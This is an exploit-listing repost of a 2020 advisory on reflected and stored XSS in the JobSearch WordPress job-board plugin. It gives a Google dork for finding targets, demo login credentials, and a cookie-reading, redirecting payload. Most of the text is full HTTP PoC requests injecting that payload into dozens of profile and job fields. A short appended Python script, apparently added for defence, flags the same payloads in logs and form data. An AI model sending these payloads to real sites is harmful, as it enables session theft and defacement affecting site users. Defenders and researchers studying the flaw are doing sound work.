JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities

CVE: CVE-2020-35648 | Category: CWE-79 | Price: $1500 | Severity: Critical
Author: Exploit Alert Team | Risk: High | Exploitation Type: Remote | Date: 2020-07-18
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070097

Below is a copy:

JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities
[+] Exploit Title: JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/plugins/wp-jobsearch/
[+] Date: 2020-07-03
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 1.5.1
[+] Software Link: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An unauthenticated reflected XSS and multiple authenticated persistent XSS vulnerabilities were discovered in the JobSearch plugin through version 1.5.1 for WordPress.

[i] An authenticated persistent XSS stored via the Job page triggers both in the dashboard area (/user-dashboard/?tab=manage-jobs) and on the job page itself.

[i] Demo account #1 (Candidate): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer): vladvector2 / DJKNFU#$&H#IUFD (login / password)

[i] Candidate Profile URL: https://eyecix.com/plugins/jobsearch/candidate/vladvector/

[i] Employer Profile URL: https://eyecix.com/plugins/jobsearch/employer/vladvector/

[i] Employer Job URL: https://eyecix.com/plugins/jobsearch/job/poc/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?location=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Phone, Dial Code, Job Title, Academic Level, Age, Salary, Gender, Industry, Full Address)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Phone, Dial Code, Founded Since, Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Offered Salary, Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)



### [ Payload: ]

[$] "--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E

[!] GET /plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E HTTP/1.1
Host: eyecix.com



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765
Content-Length: 6644
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"



-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_phone"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="dial_code"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_sector"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_bio"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="academic-level"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="Age"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="salary"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="gender"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="industry"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------27142012921130118151484572765--



### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175
Content-Length: 6868
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_phone"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_website"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_sector"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_mm"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_yy"

1900
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_bio"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="founded-since"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------321608141216835281602774802175--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298
Content-Length: 5216
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/
Cookie: [cookies_here]

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_detail"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="application_deadline"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_sector"

12
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_type"

4
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="get_job_skills[]"

poc
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_url"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_email"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_max_salary"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="offered-salary"

31337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="career-level"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="experience"

4-years"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="gender"

male"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="Industry"

graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="qualifications"

masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------35378657672420857749655614298--
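Defender-side checks for the vectors in the PoC requests above, added here as an example and not code from the advisory or the plugin: one indicator pattern, derived from the payloads on this page, is applied to the reflected `?location=` query string as it appears in a web-server access log and to the plain-text profile/job fields of the dashboard-settings and post-new-jobs POSTs before they are stored. The log lines and form values are constructed; the field names are those of the requests above, and wp_kses_post() is the WordPress allowlist sanitiser the comment points to for the free-text fields.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Markup that the affected plain-text fields should never contain.
XSS_INDICATORS = re.compile(
    r"<(?:[a-z]|!--|/)"     # tag open, comment open, closing tag
    r"|\bon[a-z]+\s*="      # inline event handler: onerror=, onfocus=, ...
    r"|\bautofocus\b"       # lets onfocus fire without user interaction
    r"|javascript\s*:",
    re.IGNORECASE,
)

# Fields the advisory lists as rendered unescaped.  They hold plain text, so
# markup in them is an anomaly.  job_detail / user_bio (free-text editors) are
# left out: they need an allowlist sanitiser such as wp_kses_post() instead.
PLAIN_TEXT_FIELDS = {
    "user_phone", "dial_code", "jobsearch_field_candidate_jobtitle",
    "academic-level", "Age", "salary", "gender", "industry", "Industry",
    "jobsearch_field_location_address", "founded-since", "job_salary",
    "offered-salary", "career-level", "experience", "qualifications",
    "jobsearch_field_team_title[]", "jobsearch_field_team_designation[]",
    "jobsearch_field_team_experience[]", "jobsearch_field_team_description[]",
}

def looks_like_xss(value: str) -> bool:
    """True if an already URL-decoded value carries one of the indicators."""
    return XSS_INDICATORS.search(value) is not None

def check_access_log_line(line: str) -> list:
    """Query parameters in a combined-format access-log line whose decoded
    value looks like an XSS attempt (the reflected vector); [] if clean."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    if not m:
        return []
    # parse_qs percent-decodes each value, so %22%20autofocus... is inspected
    # in the form the browser would see it reflected.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    return sorted(n for n, vals in params.items() if any(map(looks_like_xss, vals)))

def check_form_fields(fields: dict) -> list:
    """Plain-text fields of a dashboard-settings / post-new-jobs POST whose
    value contains markup (the stored vectors); run this before saving."""
    return sorted(n for n, v in fields.items()
                  if n in PLAIN_TEXT_FIELDS and looks_like_xss(v))

# Constructed samples: the advisory's reflected PoC query string in a log line,
# an ordinary search, and a trimmed candidate-profile form with one payload.
REFLECTED_POC_LINE = (
    '203.0.113.7 - - [03/Jul/2020:12:00:00 +0000] "GET /plugins/jobsearch/'
    '?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60'
    '%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2F'
    'twitter.com%2Fvlad_vector%60%3B%20%22%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
)
BENIGN_LINE = ('203.0.113.8 - - [03/Jul/2020:12:00:01 +0000] "GET /plugins/'
               'jobsearch/?location=London%2C+UK HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
SAMPLE_FORM = {
    "u_firstname": "Vlad",
    "user_phone": '1337"--><!--<img src="--><img src=x onerror=alert(document.cookie)//">1"-->',
    "dial_code": "+44",
    "jobsearch_field_location_address": "1 Example Street",
}

if __name__ == "__main__":
    print(check_access_log_line(REFLECTED_POC_LINE))  # ['location']
    print(check_access_log_line(BENIGN_LINE))         # []
    print(check_form_fields(SAMPLE_FORM))             # ['user_phone']
```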



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
